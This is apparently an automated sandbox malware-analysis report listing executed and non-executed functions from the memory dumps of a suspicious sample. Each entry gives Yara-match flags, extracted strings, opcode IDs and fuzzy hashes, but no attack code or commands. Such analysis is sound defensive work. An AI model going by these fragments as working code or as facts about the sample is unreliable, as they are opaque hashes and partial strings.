                                                            Function 01172410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                            • Instruction ID: 18996b3cf45ba46cd745311dad0b2e806d010b8bb2895075990dbbf11974460c
                                                            • Opcode Fuzzy Hash: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                            • Instruction Fuzzy Hash: B151F571A04646AECB38DF5CC8909BFBBF8EB48204B148469F5D6D7741E7B4EA41C760
                                                            Function 010F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                                            • ExecuteOptions, xrefs: 011346A0
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                                            • Execute=1, xrefs: 01134713
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                            • Instruction ID: 41b98b34a775e4e636076482a87e7652e30a7b191adbf4f7e6ec7e6845f1cf4c
                                                            • Opcode Fuzzy Hash: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                            • Instruction Fuzzy Hash: 22511931A0021A6AEF25EBA8DC86FED77A8EF58704F0400EDD745AB5D1E7709A41CF52
                                                            Function 0110B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: eeabe8a47d1a83e4402f02411c66318af36769c037ee9d8236b48dcdc7247f79
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: 1781D378E092498EEF2FCE6CC8517FEBBB1AF45320F18455AD861A72D1C7B48940CB59
                                                            Function 010EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 0113031E
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                            • Instruction ID: 18a044f6b6f308b364f7cb3337da8736f8bb5a887f2a1e87bebc9e57c3e002c6
                                                            • Opcode Fuzzy Hash: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                            • Instruction Fuzzy Hash: 98E190706087429FE729CF29C888B2ABBE0BF88714F144A5DF5A58B2E1D774D945CB42
                                                            Function 010FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 01137BAC
                                                            • RTL: Resource at %p, xrefs: 01137B8E
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                            • Instruction ID: 9004b9c06e85b2910b020b3a57ca4499e4b68828d51e58053dc660a52c80193c
                                                            • Opcode Fuzzy Hash: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                            • Instruction Fuzzy Hash: FF41D3357047029FD729DE29CC41B6AB7E5EF98710F100A1DEA9A9BA80DB71E4058F91
                                                            Function 010FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 011372C1
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                                            • RTL: Resource at %p, xrefs: 011372A3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                            • Instruction ID: 76a9ff83bb737cb3d79a00de6cd3847aa750f2b22ef56ec07f8586dde39063bc
                                                            • Opcode Fuzzy Hash: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                            • Instruction Fuzzy Hash: 4E410271700203ABD729DE29CC42F6AB7A5FF94714F10061DFA95AB680DB31F8428BD1
                                                            Function 01172300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                            • Instruction ID: dff2f91dd3d7c75f27f877311d446bbc30eaa769310df555791f991065951048
                                                            • Opcode Fuzzy Hash: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                            • Instruction Fuzzy Hash: 83317572A002199FDB24DF2DDC40BEEB7F8EF58614F54455AE949E7240EB30AA458BA0
                                                            Function 01107D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: 5f450c6c40fd46670a887fced3e3fc4d694720ccd108c48e57e4f820ce4c57a1
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: F791C570E002169BDF2EDF6DC8806BEBBA5BF44320F14451EE9A5A72C4D7B0AD408B52
                                                            Function 010C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1863918098.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_1090000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                            • Instruction ID: fd367e354c0f1ce59b8e389373f3948d16b3c581cf0c5527d2a68e180d89bac1
                                                            • Opcode Fuzzy Hash: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                            • Instruction Fuzzy Hash: 06811C72D002699BDB35CB54CC45BEEBBB8AB48754F0041EAEA59B7240D7705E85CFA0

                                                            Executed Functions

                                                            Function 0272920E Relevance: 29.2, Strings: 23, Instructions: 486COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$_$`+$f$i>$m$t$t>$yv$zv$}$}
                                                            • API String ID: 0-3942510243
                                                            • Opcode ID: 34dbab3bbfc58d652faed2701552f44ca4fe3bea269c61074578397d08601640
                                                            • Instruction ID: 03efe5b68eee065839ec6d1881a47c3d5fb293421df2559f160f5782665bf645
                                                            • Opcode Fuzzy Hash: 34dbab3bbfc58d652faed2701552f44ca4fe3bea269c61074578397d08601640
                                                            • Instruction Fuzzy Hash: A1428BB0E05268DFEB68CF45C8947DDBBB2BB45308F2481D9C24E6B284DB755A88CF45
                                                            Function 02736EFE Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$O$S$\$s
                                                            • API String ID: 0-3854637164
                                                            • Opcode ID: 34835148c52b18033714975159add09a59853d8c6d7b47ae1c7b6fab0ac377f4
                                                            • Instruction ID: c10baf41b4d9ead27eb473d9e8679baa34a0a29c7d75f6e947058e3ea84b1919
                                                            • Opcode Fuzzy Hash: 34835148c52b18033714975159add09a59853d8c6d7b47ae1c7b6fab0ac377f4
                                                            • Instruction Fuzzy Hash: 2D51A2B2901218AADB16DF94DC89FEFB379AB44314F004299ED086B141EB755B54CFA1
                                                            Function 027455BE Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9=
                                                            • API String ID: 0-389403476
                                                            • Opcode ID: 1ba39770b36bb2efd0079e1446335265e113c75a81ecf2ac7fbceb1315de4861
                                                            • Instruction ID: db68380f6f9f7dc4c2426d18729860014d5e5ad6392899ff7c9e4a4888d04297
                                                            • Opcode Fuzzy Hash: 1ba39770b36bb2efd0079e1446335265e113c75a81ecf2ac7fbceb1315de4861
                                                            • Instruction Fuzzy Hash: F311ECB6D0121CAF8B00DFA9DD409EEBBF9EF88210F14456AE919E7200E7705A45CFA1
                                                            Function 027229A0 Relevance: .1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3bb3fcb993e78ad3349eeaed30b0b2ffddea547d84ec4fdd42e6b3644fe4f0c
                                                            • Instruction ID: 328291cd67c6b5df32754a84767d70e20f6f684122fffe57e1a316ba2c3ef3da
                                                            • Opcode Fuzzy Hash: d3bb3fcb993e78ad3349eeaed30b0b2ffddea547d84ec4fdd42e6b3644fe4f0c
                                                            • Instruction Fuzzy Hash: 5A4121B1D11229AFDB14CF99CC81AEEBBBCEF48710F10415AFA14E6245E7B09644CBA4
                                                            Function 0274788E Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54337d446fa869ba92829349f07c51fc25ec04c673d4127cdfb882d8e4ea316c
                                                            • Instruction ID: 8d4eb67f9e6cfcd03bec2f8d2225c1c4560fc3b7f6f5020b469d39086da7fd1d
                                                            • Opcode Fuzzy Hash: 54337d446fa869ba92829349f07c51fc25ec04c673d4127cdfb882d8e4ea316c
                                                            • Instruction Fuzzy Hash: 153118B1A00209ABDB14DF98D845EEFB7F9EF88300F104209FD19A7244DB70A9158FA1
                                                            Function 027481DE Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba98c41e336530404247d220aab491f9420333af4528bc8c5997651ad2a80bef
                                                            • Instruction ID: ef827593af90ad32912dbe1bd92991c9eeaade4fabd59a4ca65b3db4cc492fca
                                                            • Opcode Fuzzy Hash: ba98c41e336530404247d220aab491f9420333af4528bc8c5997651ad2a80bef
                                                            • Instruction Fuzzy Hash: AF2128B1A00609AFDB24EF98CC45EEFB7B9EF89700F104109FD19A7284D771A915CBA5
                                                            Function 02736D3E Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 243c135a4095cb6747dc3667deed954e439b7db5e3ad43846ca40462c780e62b
                                                            • Instruction ID: 314100d92ac271cb62816ae50734e109d6e55dbeec035af06233311b5f3023d3
                                                            • Opcode Fuzzy Hash: 243c135a4095cb6747dc3667deed954e439b7db5e3ad43846ca40462c780e62b
                                                            • Instruction Fuzzy Hash: 7E11C6B23C03057BF7219A558C42FAB739D9BC4B20F244005FF04AE1C1EBA5B8114AB8
                                                            Function 0274427E Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8b047226e4cf2ee44a1ab719abde226497fa320677b12104342e7a5d5407d83
                                                            • Instruction ID: a42fb43bc4e4498de4c4537d92167170f62381535b2102892accc3b457efc3db
                                                            • Opcode Fuzzy Hash: a8b047226e4cf2ee44a1ab719abde226497fa320677b12104342e7a5d5407d83
                                                            • Instruction Fuzzy Hash: 5521D3B6D0121DAF8B00DF99D9419EFB7F9EF48210F14456AE919E7200E7705A458FE1
                                                            Function 0274769E Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2ce462a3ec75bf52468d33be574df14a618b7a36356d41f72aac975e0b870155
                                                            • Instruction ID: adb18de0c5e01cfe26fd0a8caced5776d84872303cda6c8ae264f52d279ec476
                                                            • Opcode Fuzzy Hash: 2ce462a3ec75bf52468d33be574df14a618b7a36356d41f72aac975e0b870155
                                                            • Instruction Fuzzy Hash: 0311D071540259ABD721EBA8CC05FEFB3ADEFC9700F004109FD099B284DB7069158BA1
                                                            Function 0274751E Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1662f6d820b573e8cf825ced8c2dfc1149c67ff21fd4f63b6d7b1b91a47811d0
                                                            • Instruction ID: d5069c2e730a764fe8756cfca7c1897b94866d44bdff5758a388073696447f70
                                                            • Opcode Fuzzy Hash: 1662f6d820b573e8cf825ced8c2dfc1149c67ff21fd4f63b6d7b1b91a47811d0
                                                            • Instruction Fuzzy Hash: 74119071540249ABD721EFA8CC49FEFB3A9EF89700F104509FD09AB284DB71A905CBA5
                                                            Function 0274853E Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                            • Instruction ID: a2124a1cae0bc9556c9e95664bc6ed4d1b61da8b4f64b8fce659a8e175f4aded
                                                            • Opcode Fuzzy Hash: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                            • Instruction Fuzzy Hash: 860180B2204148BBCB54DE99DD95EEB77AEAF8C714F408609FA09E3240D630F8518BA4
                                                            Function 027441EE Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea9f83b476703569a497567ae94f9b55c767c8ae5c7d8084d9c0c4b31f86b8b3
                                                            • Instruction ID: e59c6cb358751f9c7944aa503f36018b965ae2d8dd336a51491a04ea785a87a2
                                                            • Opcode Fuzzy Hash: ea9f83b476703569a497567ae94f9b55c767c8ae5c7d8084d9c0c4b31f86b8b3
                                                            • Instruction Fuzzy Hash: 9001D7B2D01228AF8B41DFE8D9459EFBBF9AB58200F14456EE819F3240F7705A448FA1
                                                            Function 02722AF2 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c88a105afdb57d754c3ccbf7dc919d1d2fb40ef74bf4e6a6c2ce3675636679be
                                                            • Instruction ID: e750323695cc1a7cd4063ff1ca758aee2def3087c363355d17e19d7ec16d46c7
                                                            • Opcode Fuzzy Hash: c88a105afdb57d754c3ccbf7dc919d1d2fb40ef74bf4e6a6c2ce3675636679be
                                                            • Instruction Fuzzy Hash: 03F0B4736101126BD7204E7DAC81FD6B79CFBC4324F250622F918D7642E731D85587A0
                                                            Function 0274779E Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0beca4c5030d87ac569e1118754566c271f2f3493c482814f00c1c50a5af95f8
                                                            • Instruction ID: f9dcb4e156b45747df324fb76007be9f7eea900770873542a0ee6df9e4d2f454
                                                            • Opcode Fuzzy Hash: 0beca4c5030d87ac569e1118754566c271f2f3493c482814f00c1c50a5af95f8
                                                            • Instruction Fuzzy Hash: A3F01C76204209BBDB10EF99DC85EAB77ADEFC9710F008509FE1897240D670B9118BB4
                                                            Function 02736E5E Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                            • Instruction ID: 6a51feb8d3fca4041761b22980974d283d4af2e863552a0b04f7d8246946de47
                                                            • Opcode Fuzzy Hash: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                            • Instruction Fuzzy Hash: 5DF01271815209EBDB14DFA4D841BDEBBB9EB04720F2047A9E8259B280D73597548B85
                                                            Function 0274814E Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction ID: 3c78ea3629676d8284995663e973974d8662f05925b503ee3ddb7967a2d15fb4
                                                            • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction Fuzzy Hash: A1E04632204218BBE621EA59DC05F9BB7AEDBC5714F004419FA0CA7241C670B9118AF0
                                                            Function 02729C43 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0551978a0c2b290154f59d25f12fe7dab407836f126f1f808668b8db29d4e9fc
                                                            • Instruction ID: 0351c8e2a4f728c7b440021fc6f7a24eecf56145ba1298e183c00db5773f809a
                                                            • Opcode Fuzzy Hash: 0551978a0c2b290154f59d25f12fe7dab407836f126f1f808668b8db29d4e9fc
                                                            • Instruction Fuzzy Hash: 64A00299648072A51B9731511F4447B3843D6475307E525606E93DF18BD6808C766442

                                                            Non-executed Functions

                                                            Function 02732C65 Relevance: 51.4, Strings: 41, Instructions: 167COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                            • API String ID: 0-3248090998
                                                            • Opcode ID: d0e7571c0df165a9a4b5ed54add29b8d5dc776181788390e167ec6a48bc86d42
                                                            • Instruction ID: f8c6060e8b0d2cb74116733b9d26fd8c604235c8efd7cba2376e98f0bc0ce00e
                                                            • Opcode Fuzzy Hash: d0e7571c0df165a9a4b5ed54add29b8d5dc776181788390e167ec6a48bc86d42
                                                            • Instruction Fuzzy Hash: 2F91FFF08052A98ACB118F55A5603DFBF71BB95304F1581E9C6AA7B243C3BE4E85DF90
                                                            Function 02729229 Relevance: 26.4, Strings: 21, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_24d0000_zKwhguHavy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /$#2$+$0$4$:c$BL$C$Gj$I$Y$^$`+$f$i$i>$m$t$yv$zv$}
                                                            • API String ID: 0-617331232
